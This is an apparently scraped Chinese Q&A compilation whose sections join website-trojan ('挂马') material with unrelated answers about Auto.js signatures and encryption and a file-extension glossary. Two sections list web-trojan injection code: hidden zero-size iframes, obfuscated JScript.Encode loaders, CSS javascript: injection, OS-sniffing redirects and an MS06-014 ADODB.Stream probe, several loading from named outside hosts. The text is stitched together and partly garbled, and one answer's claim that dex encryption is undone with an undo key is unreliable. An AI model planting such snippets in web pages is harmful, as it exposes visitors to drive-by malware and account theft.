A. 如何进行网站挂马检测与清除
挂马是常见的对网站和客户都影响巨大的危害之一。如果是在访问出来的源文件的头上,或是最后有被加代码,这个一般是网站文件被要改了,或是ARP,如果是源文件的很多数据位置(中间),那一般是数据库被人挂了。服务器上首先要安装防病毒软件,而且要保持在线病毒库的更新,本人推荐使用eset nod32杀毒软件,效果不错,监测查杀木马很及时,一般如果服务器上的网页里被挂马了,一般都会检测出来。
不完全统计,90%的网站都被挂过马,挂马是指在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险超过。目前挂马主要是为了商业利益,有的挂马是为了赚取流量,有的是为了盗取游戏等账号,也有的是为了好玩,不管是处于那种目的,对于访问被挂马的网站来说都是一种潜在的威胁,影响运营网站公司形象。
一:框架挂马
<iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<SCRIPT language="JScript.Encode" src=http://www.softxp.net/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马
<body onload="window.location='地址';"></body>
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe
src="http://www.softxp.net/muma.htm/"></iframe>';
六:css中挂马
body {
background-image: url('javascript:document.write("<script
src=http://www.softxp.net/muma.js></script>")')}
七:JAJA挂马
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");
</script>
八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
九:伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高级欺骗
<a href="http://www.softbar.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_softbar_com();
return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open
(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizabl
e=no,history=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
十一:判断系统代码
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>
十二:判断是否有ms06014代码
<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=http://www.softxp.net width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=http://www.softxp.net width=100% height=100% scrolling=no frameborder=0>")
end if
</script>
十三:智能读取js的代码demo
//读娶src的对象
var v = document.getElementById("advjs");
//读娶src的参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));
document.write("<iframe src=\"http://www.softxp.net/1/"+u_num+".htm\" width=\"0\" height=\"0\"
frameborder=\"0\"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/www.softxp.net\/demo.js\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'http:\/\/www.softxp.net\/demo.js\')\"><\/DIV><\/DIV><
\/BODY><\/HTML>")
//分析src的参数函数
function getUrlParameterAdv(asName,lsURL){
loU = lsURL.split("?");
if (loU.length>1){
var loallPm = loU[1].split("&");
for (var i=0; i<loallPm.length; i++){
var loPm = loallPm.split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}
B. autojs如何查看签名密码
跳过/*** 获取应用的签名密码
*/function getCertificateSHA1Fingerprint() { //获取包管理器 let pm = context.getPackageManager()//获取当前要获取 SHA包名,也可以用其他的包名,但需要注意, //在用其他包名的前提是,此方法传递的参数 Context 应该是对应包tpackageName=context.getPackageName(); //返回包括在包中的签名信息let flags = PackageManager.GET_SIGNATURES; //获得包的所有内容信类 let packageInfo = .getPackageInfo(packageName, flags); //签名信息 let signatures = packageInfo.signatures;et cert = signatures[0].toByteArray()//将名转换为字节数组流et inpunewteArrayInputStream(cert); //证书工厂类,这个类实现了出厂合格证算法的功letcf=CertificateFactory.getInstance("X509"); //X509 证书,X.509 是一种非常通用的证书格式let c = cf.generateCertificate(input);//加密算法的类,这里的参数可以使 MD4,MD5 等加密算法let md = MessageDigest.getInstance("SHA1");//获得公钥let publicKey = md.digest(c.getEncoded()); //字节到十六进制的格式转换 let hexString = byte2HexFormatted(publicKey); return hexString;//这里是将获取到编码进行16 进制转换function byte2HexFormatted(arr) { let str = new StringBuilder(arr.length * 2); for (let i = 0; i < arr.length; i++) { let h = Integer.toHexString(arr[i]); et l = h.length if (l == 1) h = "0" + h; if (l > 2) h = h.substring(l - 2, l); str.append(h.toUpperCase()) if (i < arr.length - 1)str.append(":"); } return str.toString();}
C. auto.js用什么加的密
使用js混淆加密和庖丁。
Auto.js已推出,有更强的加密、专业级调试等功能,访问官网获取。
D. 请教文件后缀的代表意思!~
以下不是我原创的。
常见的文件后缀名
.ACA:Microsoft的代理使用的角色文档
.acf:系统管理配置
.acm:音频压缩管理驱动程序,为Windows系统提供各种声音格式的编码和解码功能
.aif:声音文件,支持压缩,可以使用Windows Media Player和QuickTime Player播放
.AIF:音频文件,使用Windows Media Player播放
.AIFC:音频文件,使用Windows Media Player播放
.AIFF:音频文件,使用Windows Media Player播放
.ani:动画光标文件扩展名,例如动画沙漏。
.ans:ASCII字符图形动画文件
.arc:一种较早的压缩文件,可以使用WinZip,WinRAR,PKARC等软件打开
.arj:压缩文件。可以使用WinZip,WinRAR,PKARC等软件打开
.asf:微软的媒体播放器支持的视频流,可以使用Windows Media Player播放
.asp:微软的视频流文件,可以使用Windows Media Player打开
.asp:微软提出的Active Server Page,是服务器端脚本,常用于大型网站开发,支持数据库连接,类似PHP。可以使用Visual InterDev编写,是目前的大热门
.asx:Windows Media 媒体文件的快捷方式
.au:是Internet中常用的声音文件格式,多由Sun工作站创建,可使用软件Waveform Hold and Modify 播放。Netscape Navigator中的LiveAudio也可以播放.au文件
.avi:一种使用Microsoft RIFF规范的Windows多媒体文件格式,用于存储声音和移动的图片
.bak:备份文件,一般是被自动或是通过命令创建的辅助文件,它包含某个文件的最近一个版本,并且具有于该文件相同的文件名
.bas Basic:语言源程序文件,可编译成可执行文件,目前使用Basic开发系统的是Visual Basic
.bat:批处理文件,在MS-DOS中,.bat文件是可执行文件,有一系列命令构成,其中可以包含对其他程序的调用
.bbs:电子告示板系统文章信息文件
.bfc:Windows的公文包文件
.bin:二进制文件,其用途依系统或应用而定
.bmp:Bitmap位图文件,这是微软公司开发Paint的自身格式,可以被多种Windows和Windows NT平台及许多应用程序支持,支持32位颜色,用于为Windows界面创建图标的资源文件格式。
.c:C语言源程序文件,在C语言编译程序下编译使用
.cab:Microsoft制订的压缩包格式,常用于软件的安装程序,使用Windows自带的实用程序,Extract.exe可以对其解压缩,WinZip,WinRAR等都支持这种格式
.cal:Windows 中的日历文件
.cdf:Internet Explorer的频道文件
.cdr:CorelDraw中的一种图形文件格式,它是所有CorelDraw应用程序中均能够使用的一种图形图像文件格式
.cdx:索引文件,存在于Dbase,Foxbase,Foxpro系统软件环境下
.cfg:配置文件,系统或应用软件用于进行配置自己功能,特性的文件
.chm:编译过后的HTML文件,常用于制作帮助文件和电子文档
.clp:在Windows下剪贴板中的文件格式
.cmd:用于Windows NT/2000的批处理文件,其实与BAT文件功能相同,只是为了与DOS/Windows 9x下的BAT有所区别
.cmf:声卡标准的音乐文件,FM合成器等可以回放
.cnf:NetMeetting会议连接文件
.cnt:联机帮助文件目录索引文件,通常和同名的.hlp文件一起保存
.col:由Autodesk Animator,Autodesk Animator Por等程序创建的一种调色板文件格式,其中存储的是调色板中各种项目的RGB值
.com:DOS可执行命令文件,一般小于64KB
.cpl:控制面板扩展文件,Windows操作系统使用
.cpp:C++语言源程序,非常强大的语言,在各种平台中都有相应的开发系统
.crd:Windows中的卡片文件
.crt:用于安全方面的证书认证文件
.cur:Windows下的光标资源文件格式,可用光标编辑软件编辑
.css:Text/css文件
.dat:数据文件,在应用程序中使用
.dat:VCD中的图象声音文件,VCD播放软件可调用,或是通过VCD机播放
.dbf:数据库文件,Foxbase,Dbase,Visual FoxPro,等数据库处理系统所产生的数据库文件
.dcx:传真浏览文档文件
.ddi:映象文件,DUP,HD,IMG等工具可展开
.dev:设备驱动程序
.dib:设备无关位图文件,这是一种文件格式,其目的是为了保证用某个应用程序创建的位图图形可以被其它应用程序装载或显示一样
.dir:目录文件
.dll:Windows动态连接库,几乎无处不在,但有时由于不同版本DLL冲突会造成败各种各样的问踢
.doc:是目前市场占有率最高的办公室软件Microsoft Office中的字处理软件Word创建的文档
.dos:Windows保留的MS-DOS的某些系统文件
.dot:Microsoft Word的文档模板文件,通过模板可以简化一些常用格式文档的创建工作,而且可以内嵌VBA程序来实现某些自动化功能
.drv:设备驱动程序文件,用在各种系统中
.dwg:AutoCAD的图纸文件,也是许多绘图软件都支持的格式,常用于共享数据
.dxb:AutoCAD创建的一中图形文件格式
.dxf:图形交换格式,一种计算机辅助设计的文件格式,最初开发用来与AutoCAD一起使用,以便于图形文件在应用程序之间的传递,它以ASCII方式储存图形,在表现图形的大小方面十分精确
.der:Certiticate文件
.dic:Txt文件
.emf:由Microsoft公司开发的Windows 32位扩展图元文件格式,其总体设计目标是要弥补在Microsoft Windows 3.1(Win16)中用的*.wmf文件格式的不足,使得图元文件更加易于使用
.eps:用PostScript语言描述的一种图形文件格式,以文本文件保存,在PostScript图形打印机上能打印出高品质的图形图象,最高能表示32位图形图象
.err:编译错误文件,存在于Dbase,Foxbase,Foxpro系列软件环境下
.exe:可执行文件,虽然后缀名相同,但具有不同的格式和版本
.exp:3DS使用的显示卡驱动程序
.exc:Txt文件
.flc:Autodesk Animator和Animatorpro的动画文件,支持256色,最大的图象象索是64000*64000,支持压缩,广泛用于动画图形中的动画序列,计算机辅助设计和计算机游戏应用程序
.fnd:保存的搜索结果
.fon:点阵字库文件
.for:Fortran语言程序
.fot:指向字体的快捷键
.fp: 配置文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下
.fpt:备注字段文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下
.frt:报表文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下
.frx:报表文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下
.fxp:编译后的程序,存在于Dbase,Foxbase,Foxpro系列软件的环境下
.gif:在各种平台的各种图形处理软件上均能够处理的,经过压缩的一种图形文件格式
.grh:方正公司的图象排版文件
.grp:Windows下的程序管理器产生的组窗口文件
.goc:Gocserve
.gra:MSGraph.Chart.5
.h: C语言源程序头文件
.hlp:Windows应用程序帮助文件
.hqx:Macintosh中使用BinHex将二进制文件编码为7位的文本文件,大多数Macintosh文件皆以.hqx出现(.bin极少使用),在Macintosh中,可使用StuffIt Expander对.hqx解码,在Windows中可使用BinHex 13解码
.ht: 超级终端
.htm:保存超文本描述语言的文本文件,用于描述各种各样的网页,使用各种浏览器打开
.html:同.htm文件
.icm:图象配色描述文件
.ico:Windows中的图标文件,可以包含同一个图标的多种格式,使用图标编辑软件创建
.idf:MIDI乐器定义
.idx:索引文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下
.iff:文件交换格式文件,这种文件格式多用于Amiga平台,在这种平台上它几乎可以存储各种类型的数据,在其它平台上,IFF文件格式多用于存储图象和声音文件
.image:MAcintosh磁盘映象文件,常见于萍果机的FTP网点,在Macintosh中由Shrink Wrap处理
.ime:Windows下的输入法文件
.img:磁盘映象文件,用HD-COPY,WinImage等工具打开后可以恢复到一张磁盘上
.inc:汇编语言包含文件,类似C/C++中的.H文件
.inf:Windows下的软件安装信息,Windows的标准安装程序根据此文件内的安装信息对软件,驱动程序等进行安装
.ini:Windows中的初始化信息文件,已经用的不多了,新的应用程序将设置保存在系统的注册表中
.jar:一种压缩文件,ARJ的新版本,不过不太流行,可以使用WinJar,Winrar等打开
.jpeg:一种图片压缩文件,同.jpg
.jpg:静态图象专家组制订的静态图象压缩标准,具有很高的压缩比,使用非常广泛,可使用PhotoShop等图象处理软件创建
.lnk:快捷方式,这个文件指向另一个文件,开始菜单的程序文件夹下每条项目都是一个LNK文件
.log:日志文件,通常用来记录一些事件之类
.lzh:一种古老的压缩文件,可以使用WinRAR打开
.mac:Macintosh中使用的一中灰度图形文件格式,在Macintosh Paintbrush中使用,其分辨率只能是720*567
.mag :图形文件格式
.mdb :Microsoft Access使用的数据库格式,是非常流行的桌面数据库
.men :内存应用文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下
.mid :音频压缩文件,曾经非常流行,不过在现在的软件中用的很少了
rle :一种压缩过的位图文件格式,RLE压缩方案是一种极其成熟的压缩方案,特点是无损失压缩,既节省了磁盘空间又不损失任何图像数据,但在打开这种压缩文件时,要花费更多时间,此外,一些兼容性不太好的应用程序可能会搭不开
.rm :Windows下的RealPlayer所支持的视频压缩文件,网上非常流行的流式视频文件,很多实时视频新闻等都是采用这种格式的,不过,最新的Windows Media Video V8已经对其发起了强大的攻势
.rmi :MIDI音序文件
.rtf :丰富文本格式文件,以纯文本描述内容,能够保存各种格式信息,可以用写字版,Word等创建
.sav :存档文件
.scp :用于Windows系统中Internet拨号用户,自动拨号登录用的脚本文件,可避免手动登录时繁琐的键盘输入
.scr :屏障保护文件
.sct :屏幕文件
.scx :屏幕文件
.set :Microsoft备份集文件,用于保存要备份的内容,设置等信息
.shb :指向一个文档的快捷方式
.snd :Mac声音文件,Apple计算机公司开发的声音文件格式,被Macintosh平台和多种Macintosh应用程序所支持,支持某些压缩
.sql:查询文件,在Dbase,Foxbase,Foxpro系列软件的环境下使用
.svg :SVG可以算是目前最火热的图像文件格式了,它是基于XML由WorldWideWebConsortium联盟开发的,SVG是可缩放的矢量图形
.svx :Amiga声音文件,Commodore所开发的声音文件格式,被Amiga平台和应用程序所支持,不支持压缩
.swf :flash是Micromedia公司的产品,严格说它是一种动画编辑软件,实际上它是制作出一种后缀名为.swf的动画,这种格式的动画能用比较小的体积来表现丰富的多媒体形式,并且还可以与HTML文件达到一种"水乳交融"的境界
.swg:虚拟内存交换文件,由操作系统使用
.sys:系统文件,驱动程序等,在不同的
E. autojspro的dex加密怎么还原
autojspro的dex加密还原用撤销键。根据查询相关内容得知,autojspro的dex加密后,可直接用撤销键完成还原,若autojspro的dex加密已保存,就不能实现还原功能了。
F. 常见网页病毒的源代码
挂马代码如下
一:框架挂马
<iframe src=地址 width=0 height=0></iframe>
二:js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马
<body onload="window.location='地址';"></body>
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.caminix.cn"></iframe>';
六:css中挂马
body {
background-image: url('javascript:document.write("<script src=http://www.caminix.cn></script>")')}
七:JAJA挂马
<SCRIPT language=javascript>
window.open ("http://www.caminix.cn","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
九:伪装调用:
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高级欺骗
<a href="http://www.163.com" onMouseOver="www_163_com(); return true;"></a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="http://www.caminix.cn";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,history=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
G. Hook逆向离线加密的autojs打包的脚本
牙叔教程 简单易懂
雷电模拟器Android版本: 7.1.2
Android Studio版本: 4.1.2
jadx-gui版本: 1.2.0
脚本打包使用离线加密的时候, javascript脚本本身应该先 混淆 一遍, 然后再用离线打包,
或者, 直接使用自带的 离线Dex加密 或者 离线Snapshot加密
思路是最重要的, 其他的网络, bing, stackoverflow, 安卓文档, autojs文档, 最后才是群里问问
--- 牙叔教程
部分内容来自网络
本教程仅用于学习, 禁止用于其他用途